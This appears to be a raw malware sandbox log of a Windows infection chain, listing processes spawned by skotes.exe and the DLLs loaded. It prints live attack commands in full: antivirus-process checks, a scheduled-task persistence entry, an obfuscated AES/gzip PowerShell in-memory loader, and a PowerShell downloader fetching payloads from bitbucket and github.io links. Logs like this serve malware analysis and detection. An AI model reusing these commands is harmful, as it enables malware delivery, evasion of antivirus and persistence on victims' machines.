Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072554001\dDFw6mJ.exe "C:\Users\user\AppData\Local\Temp\1072554001\dDFw6mJ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe "C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe "C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe "C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe "C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Process created: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe "C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Process created: C:\Users\user\AppData\Local\Temp\FQZHGI4TELUEK712J739LWFDT7.exe "C:\Users\user\AppData\Local\Temp\FQZHGI4TELUEK712J739LWFDT7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process created: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe "C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe"
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com" "C:\Users\user\AppData\Local\GuardTech Solutions\r"
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$cvIm='EntFeXgryPFeXgoinFeXgtFeXg'.Replace('FeXg', ''),'EleIXmOmeIXmOntIXmOAIXmOtIXmO'.Replace('IXmO', ''),'DecOszEomOszEprOszEeOszEsOszEsOszE'.Replace('OszE', ''),'CPUxvopPUxvyTPUxvoPUxv'.Replace('PUxv', ''),'RYWrpeaYWrpdLYWrpiYWrpnesYWrp'.Replace('YWrp', ''),'CgarcrgarcegarcategarcDgarcecgarcrgarcypgarctgarcorgarc'.Replace('garc', ''),'LoIVFlaIVFldIVFl'.Replace('IVFl', ''),'ChagsQKnggsQKeEgsQKxtgsQKegsQKnsgsQKiogsQKngsQK'.Replace('gsQK', ''),'MAaAUaiAaAUnAaAUModAaAUulAaAUeAaAU'.Replace('AaAU', ''),'SpojXFlitojXF'.Replace('ojXF', ''),'IFgBOnvFgBOokFgBOeFgBO'.Replace('FgBO', ''),'GevSbGtCuvSbGrrvSbGevSbGntvSbGPrvSbGovSbGcevSbGsvSbGsvSbG'.Replace('vSbG', ''),'TrUSbUansUSbUforUSbUmUSbUFiUSbUnaUSbUlBUSbUlUSbUockUSbU'.Replace('USbU', ''),'FriYUfoiYUfmiYUfBaiYUfse6iYUf4StiYUfriniYUfgiYUf'.Replace('iYUf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($cvIm[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function DsOlp($WSuTo){$fdRhP=[System.Security.Cryptography.Aes]::Create();$fdRhP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fdRhP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fdRhP.Key=[System.Convert]::($cvIm[13])('0L3qu7Et4bHK3WbvAGFJicWZ8cEspciFOjtqHmR81xg=');$fdRhP.IV=[System.Convert]::($cvIm[13])('JIfnsDyTRqTk8ftuN6oGsw==');$QWYHd=$fdRhP.($cvIm[5])();$FunRP=$QWYHd.($cvIm[12])($WSuTo,0,$WSuTo.Length);$QWYHd.Dispose();$fdRhP.Dispose();$FunRP;}function MmHQh($WSuTo){$zZDvJ=New-Object System.IO.MemoryStream(,$WSuTo);$rZPaI=New-Object System.IO.MemoryStream;$bbTac=New-Object System.IO.Compression.GZipStream($zZDvJ,[IO.Compression.CompressionMode]::($cvIm[2]));$bbTac.($cvIm[3])($rZPaI);$bbTac.Dispose();$zZDvJ.Dispose();$rZPaI.Dispose();$rZPaI.ToArray();}$zLeDh=[System.IO.File]::($cvIm[4])([Console]::Title);$QkJPW=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 5).Substring(2))));$gxzXU=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 6).Substring(2))));[System.Reflection.Assembly]::($cvIm[6])([byte[]]$gxzXU).($cvIm[0]).($cvIm[10])($null,$null);[System.Reflection.Assembly]::($cvIm[6])([byte[]]$QkJPW).($cvIm[0]).($cvIm[10])($null,$null); "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1072554001\dDFw6mJ.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c 67a27a89a5061.vbs
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a27a89a5061.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.Sfgjgjk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\random.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Section loaded: kernel.appcore.dll	Jump to behavior
